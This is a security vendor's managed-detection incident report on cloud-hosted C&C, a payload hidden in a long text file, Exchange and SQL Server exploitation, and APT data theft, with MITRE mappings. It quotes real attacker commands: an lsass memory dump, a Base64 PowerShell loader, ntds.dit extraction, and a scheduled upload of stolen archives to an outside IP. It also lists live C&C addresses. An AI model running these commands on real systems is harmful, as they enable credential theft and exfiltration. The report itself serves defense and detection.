Introduction
This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.
Command and control via the public cloud
The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.
Case #1: Cloudflare Workers as redirectors
Case description
The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:windowssystem32[legitimate binary name][1].exe.
While investigating, we found that the process had initiated network connections to a potential C&C server:
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence] hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]
The URL format indicates the use of Cloudflare Workers.
We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:
CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTemp[filename].doc fullSeveral minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.
The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
Case detection
The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1588.002: Tool
AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter
A malicious payload was executed in the victim’s system and started communicating with the C&C server
T1620: Reflective Code Loading
AM verdict: MEM:Trojan.Win64.Cobalt.gen
The malicious payload migrated to the victim’s memory
Detection of code injection from an unknown binary into a system binary
T1071.001: Web Protocols
Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level
The attacker’s communications with the C&C server
T1584.006: Web Services
URL reputation, regular expression in URL
The attacker’s communications with the C&C server
T1102.001: Dead Drop Resolver
URL reputation, regular expression in URL
The attacker’s communications with the C&C server
T1003.001: LSASS Memory
AM detection on lsass memory access
The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file
Regex on command like: rundll32.exe C:WindowsSystem32comsvcs.dll MiniDump lsass.dmp full
T1546.003: Windows Management Instrumentation Event Subscription
WMI active script event consumer created remotely
The attacker gained persistence through active WMI
Payload hidden in long text
Case #1: A scheduled task that loads content from a long text file
Case description
This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:
MicrosoftWindowsManagementProvisioningYLepG5JS75C8620-1D71-4322-ACE4-45C018679FC9, HKLMSOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTasks{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:WindowsSystem32TasksMicrosoftWindowsManagementProvisioningYLepG5JS75C8620-1D71-4322-ACE4-45C018679FC9Command:
"wscript.exe" /e:vbscript /b "C:WindowsSystem32r4RYLepG59B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"The scheduled task invokes a VBS script (file path: C:WindowsSystem32r4RYLepG59B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes from the Base64-encoded content of the file C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys, and then executes the latter.
The VBS script mimics the content and behavior of the legitimate C:WindowsSystem32SyncAppvPublishingServer.vbs file, but the path and file name are different.
The customer approved our MDR SOC analyst’s request to analyze the file C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).
The decoded payload contained a link to a C&C server:
Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):
C:Users<… cut out … >DownloadsExcelAnalyzer 3.4.3crackPatch.exe
The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.
Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.
Case detection
The table below lists the attack techniques and how they were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1547.001: Registry Run Keys / Startup Folder
Regex on autostart entry details
Malicious persistence
Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen
T1059.001: PowerShell
Regex on autostart entry details
Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”
T1216.001: System Script Proxy Execution
Regex on command line
Malicious payload execution via C:WindowsSystem32
SyncAppvPublishingSer
ver.vbs
T1204.002: Malicious File
Execution sequence: svchost.exe
→ explorer.exe → patch.exe
From directory: C:Users
DownloadsExcelAnaly
zer 3.4.3crack
The user executed a file downloaded by the Tixati BitTorrent client
As a result, the file 02f4f239-0922-49fe-
a338-c7460cb37d95.sys was created
Creation of
c:usersdownloadsex
celanalyzer
3.4.3setup_excelanalyzer.exe
In this order: chrome.exe →
tixati.exe
Creation of 02f4f239-0922-49fe-
a338-c7460cb37d95.sys
In this order: svchost.exe →
patch.exe
Process command line:
“C:UsersDownloads
ExcelAnalyzer
3.4.3crackPatch.exe”
The contents of 02f4f239-0922-
49fe-a338-c7460cb37d95.sys do
not match the extension (text
instead of binary).
T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response
02f4f239-0922-49fe-a338-
c7460cb37d95.sys contained text;
starting on line 4890, it contained
a Base-64-encoded payload.
Attacker hid payload
T1071.001: Web Protocols
The SOC checked for successful connections to the discovered C&C server.
A search for the attacker’s possible attempts to execute further stages of the attack
Server-side attacks on the perimeter
Case #1: A ProxyShell vulnerability in Microsoft Exchange
Case description
During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:
127.0.0.1c$inetpubwwwrootaspnet_clientrqfja.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyecpauthyjiba.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthjiwkl.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentqwezb.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentscriptsqspwi.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentscriptspremiumupxnl.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentthemesqikyp.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentthemesresourcesjvdyt.aspx c:program filesmicrosoftexchange serverv15frontendhttpproxyecpauthmgsjz.aspx
The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.
Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.
Similar behavior was detected the next day, this time an attempt at creating one file:
127.0.0.1c$inetpubwwwrootaspnet_clientrmvbe.aspx
KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1190: Exploit Public-Facing Application
Heuristic AM engine verdict: PDM:Exploit.Win32.Generic
Exploitation attempt
T1505.003: Web Shell
Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
Web shell file creation
Case #2: MS SQL Server exploitation
Case description
The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21—-181797 (Domain / username).
The SQL Server process attempted to create a suspicious file:
c:windowsserviceprofilesmssql$sqlexpressappdatalocaltemptmpd279.tmp
We observed that a suspicious assembly was loaded to the sqlserver process (c:program filesmicrosoft sql servermssql15.sqlexpressmssqlbinnsqlservr.exe) db_0x2D09A3D665536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16) with the original file name evilclr.dll.
The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.
The SQL server host had previously been seen accessible from the Internet and in the process of being scanned by a TOR network.
After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:
The created SQL jobs attempted to connect to URLs like those shown below:
hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
Some of the IP addresses were already on the deny list, while others were added in response to this incident.
We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.
The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.
Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine.
The attacker scanned the SQL Server host
T1190: Exploit Public-Facing Application
The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe
The attacker successfully exploited the SQL server
Execution of the object previously detected as an autostart entry with a bad reputation: sql:SQLEXPRESSdb_0x2D09A3D665537_fscbd; original file name: evilclr.dll
T1059.001: PowerShell
Command line analysis showed the use of PowerShell.
Malicious persistence via an SQL Server job
T1027: Obfuscated Files or Information
Regex- and ML-based analysis of the SQL Server Agent job command line
The attacker attempted to evade detection
Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line
T1505.001: SQL Stored Procedures
SQL Server Agent job analysis
Malicious persistence via an SQL Server job
Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a
T1071.001: Web Protocols
The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server.
The attacker’s C&C server
What does exfiltration in a real-life APT look like?
Case #1: Collecting and stealing documents
Case description
Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:
“cmd.exe” /c “c:perflogs1.bat”, which started:
findstr "10.<…cut…>. wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1 wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
After that, the following inventory commands were executed by the binary C:ProgramDataUSOPrivate UpdateStorewindnphd.exe:
C:Windowssystem32cmd.exe /C ping 10.<…cut…> -n 2 query user C:Windowssystem32cmd.exe /C tasklist /S 10.<…cut…> -U <domain><username3> -P <password> C:Windowssystem32cmd.exe /C net use 10.<…cut…>ipc$ "<password>" /u:<domain><username3> C:Windowssystem32cmd.exe /C net group "domain admins" /domain C:Windowssystem32cmd.exe /C ping <hostname1> C:Windowssystem32cmd.exe /C vssadmin list shadows C:Windowssystem32cmd.exe /C ipconfig /all C:Windowssystem32cmd.exe /C dir 10.<…cut…>c$
Suspicious commands triggering actions in the Active Directory Database were executed:
C:Windowssystem32cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit C:Windowssystem32cmd.exe /C dir c:windowssystem32ntds.dit C:Windowssystem32cmd.exe /C dir c: C:Windowssystem32cmd.exe /C dir c:windowsntdsntds.dit
After these commands were executed, the windnphd.exe process started an HTTP connection:
hxxp[:]//31.192.234[.]60:53/useintget
Then a suspicious file, c:userspublicnd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:
nd.exe c:windowssystem32configsystem c:userspublicsys.txt nd.exe c:windowsntdsntds.dit c:userspublicnt.txt C:Windowssystem32cmd.exe /C move *.txt c:userspublictmp C:Windowssystem32cmd.exe /C rar.exe a -k -r -s -m1 c:userspublicn.rar c:userspublictmp rar.exe a -k -r -s -m1 c:userspublicn.rar c:userspublictmp
Later, the SOC observed that a suspicious scheduled task had been created on the same host:
schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:userspublics.exe c:userspublic816-s.rar 38[.]54[.]14[.]183 53 down" /f
The task executed a suspicious file: c:userspublics.exe (MD5 6C62BEED54DE668234316FC05A5B2320)
This executable used the archive c:userspublic816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.
The 0816-s.rar archive was created via remote execution of the following command through psexec:
rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:userspublic816-s.rar "10.<…cut…>c$users<username4>Documents<DocumentFolder1>"
After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.
Similar suspicious behavior was detected on another host, .
First, a suspicious file was created over the SMB protocol: c:userspublicwinpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).
Next, a task was created remotely via psexec.exe:
schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:userspublicwinpdasd.exe" /f
During task execution, an external network communication was detected, and certain discovery commands were executed:
hxxp://31[.]192.234.60:53/useintget ping 10.<…cut…> -n 1 query user net use
This was followed by a connection to a network share on the host 10. as username3:
C:Windowssystem32cmd.exe /C net use 10.<…cut…>ipc$ "<password>" /u:<domain><username3>
More reconnaissance command executions were detected:
C:Windowssystem32cmd.exe /C dir 10.<…cut…>c$users<username4>AppDataRoamingAdobeLinguistics C:Windowssystem32cmd.exe /C tasklist /S 10.<…cut…> -U <domain><username3> -P <password> |findstr rundll32.exe tasklist /S 10.<…cut…> -U <domain><username3> -P <password> C:Windowssystem32cmd.exe /C taskkill /S 10.<…cut…> -U <domain><username3> -P <password> /pid <PID> /f C:Windowssystem32cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain><username3> /p "<password>" /tn MicrosoftWindowsTcpipdcrpytod
Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:
C:Windowssystem32cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn MicrosoftWindowsNetworkwindpch /tr "C:UsersadminAppDataRoamingMicrosoftNetworkwindpchsvc.exe" /f
After that, C&C communications were detected:
hxxp://139.162.35[.]70:53/micsoftgp
This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.
Case detection
The table below lists the attack techniques and how these were detected by Kaspersky MDR.
MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description
T1569.002: Service Execution
Command line analysis
The attacker performed reconnaissance and search in local logs
The attacker persisted in the victim’s system through service creation
Windows events on service installation and service start
AM behavior analysis
The attacker executed windnphd.exe through psexec
T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
Command line analysis
The attacker performed internal reconnaissance
T1021.002: SMB/Windows Admin Shares
Inbound and outbound share access
The attacker tried to access:
10..65ipc$
10..52c$
T1003.003: NTDS
Command line analysis
The attacker accessed NTDS.dit with ntdsutil
T1071.001: Web Protocols
The SOC checked if the data transfer was successful
The attacker communicated with the C&C server at hxxp[:]//31.192.234[
.]60:53/useintget
The connection was initiated by the suspicious process windnphd.exe
T1571: Non-Standard Port
The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
Attacker used the C&C server hxxp[:]//31.192.234[
.]60:53/useintget
T1587.001: Malware
Use of various suspicious binaries prepared by the attacker specifically for this attack
The attacker used custom tools:
s.exe
winpdasd.exe
windpchsvc.exe
(see detailed report below)
T1497: Virtualization/Sandbox Evasion
Detected the HookSleep function (see below)
The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe
T1036.005: Match Legitimate Name or Location
Operations with the file c:usersDefaultntusers.dat
The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat
T1140: Deobfuscate/Decode Files or Information
The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
The attacker executed arbitrary code
T1560.001: Archive via Utility
Use of the RAR archiver for data collection
The attacker archived the stolen credentials and documents
T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
Command line analysis
The attacker used a custom tool to exfiltrate data
Analysis of the process that initiated the connection
An analysis of the custom tools used by the attacker
windpchsvc.exe and winpdasd.exe
Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.
Both files read in from a file intended to deceive investigators and users by applying naming conventions that are similar to system files:
Payload file for windpchsvc.exe
The malware, windpchsvc.exe, reads from the file c:usersDefaultntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.
A similar file name was used for the winpdasd.exe malware:
Payload file for winpdasd.exe
The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):
windpchsvc.exe: decode, allocate memory, copy to mem, execute
winpdasd.exe: decode, allocate memory, copy to mem, execute via function call
The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.
Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.
The decompiled function can be seen below:
The “HookSleep” function found in both files, decompiled
When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:
The Sleep function redirected back to the malware code
s.exe
This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:
s.exe <file> <IP address> <port> <up|down>
This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.
The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:
Decompiled network transfer tool
[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.
Source:: Securelist